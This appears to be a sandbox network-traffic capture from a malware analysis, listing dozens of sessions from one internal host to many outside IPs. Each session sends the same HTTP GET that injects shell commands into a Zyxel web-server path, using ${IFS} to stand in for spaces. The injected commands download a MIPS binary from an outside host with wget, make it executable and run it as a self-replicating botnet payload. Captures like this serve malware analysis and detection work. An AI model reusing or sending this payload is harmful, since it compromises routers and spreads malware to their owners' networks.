                                      Jan 19, 2024 17:29:23.596813917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2259192.168.2.1458374186.78.109.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596856117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2260192.168.2.1441400218.101.141.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596877098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2261192.168.2.145344291.44.59.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596937895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2262192.168.2.1456828121.64.181.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.596993923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2263192.168.2.145623241.16.238.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597022057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2264192.168.2.145608039.174.114.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597042084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2265192.168.2.145891886.48.58.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597093105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2266192.168.2.1447856135.221.198.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597152948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2267192.168.2.1435514101.197.122.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597184896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2268192.168.2.14345341.171.237.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597225904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2269192.168.2.1446844197.148.62.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597269058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2270192.168.2.145532491.171.36.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597341061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2271192.168.2.1453306159.202.201.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597369909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2272192.168.2.1448560163.90.25.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597433090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2273192.168.2.145324262.18.82.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597472906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2274192.168.2.143708493.23.199.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597515106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2275192.168.2.1451584105.120.115.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597583055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2276192.168.2.1437460203.75.93.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597608089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2277192.168.2.1452454206.196.66.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597640991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2278192.168.2.1445588178.118.131.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597732067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2279192.168.2.144561676.179.80.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597732067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2280192.168.2.144388251.25.166.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597759008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2281192.168.2.1457106223.22.33.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597800970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2282192.168.2.1457840183.50.148.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597842932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2283192.168.2.1442022122.60.224.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597919941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2284192.168.2.1445134124.56.38.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597934008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2285192.168.2.14559662.61.91.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.597975969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2286192.168.2.1455802104.4.88.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598047972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2287192.168.2.1441198206.9.148.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598083973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2288192.168.2.1446734121.80.13.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598124027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2289192.168.2.145889472.137.241.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598161936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2290192.168.2.145926413.218.130.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598189116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2291192.168.2.144794419.73.158.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598242998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2292192.168.2.143587052.240.130.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598294020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2293192.168.2.1452434107.105.169.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598321915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2294192.168.2.145136812.157.116.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598364115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2295192.168.2.145430096.101.40.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598387957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2296192.168.2.14360062.81.113.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598447084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2297192.168.2.144419612.130.202.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598483086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2298192.168.2.1452536107.69.207.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598520041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2299192.168.2.1451938205.241.65.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598565102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2300192.168.2.1450634150.180.170.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598628044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2301192.168.2.1450520188.22.49.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598659039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2302192.168.2.1451554191.86.104.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598706961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2303192.168.2.1433032104.197.41.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598733902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2304192.168.2.1435856114.201.114.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598798037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2305192.168.2.1447374206.66.169.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598834038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2306192.168.2.144429012.88.21.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598887920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2307192.168.2.145839020.185.238.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598911047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2308192.168.2.1453712151.28.249.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598951101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2309192.168.2.1436438158.164.19.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.598995924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2310192.168.2.144152427.5.208.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599062920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2311192.168.2.144667864.126.55.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599109888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2312192.168.2.1456526107.252.234.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599143028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2313192.168.2.1441976132.131.135.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599170923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2314192.168.2.145305213.184.41.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599226952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2315192.168.2.144788086.161.122.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599246979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2316192.168.2.145753072.37.193.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599286079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2317192.168.2.145426852.123.82.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599329948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2318192.168.2.1438762199.21.202.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599360943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2319192.168.2.144628864.69.163.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599411964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2320192.168.2.1445554202.240.212.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599457979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2321192.168.2.1453018133.65.6.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:23.599495888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2322192.168.2.14478269.3.164.46443
                                      TimestampBytes transferredDirectionData
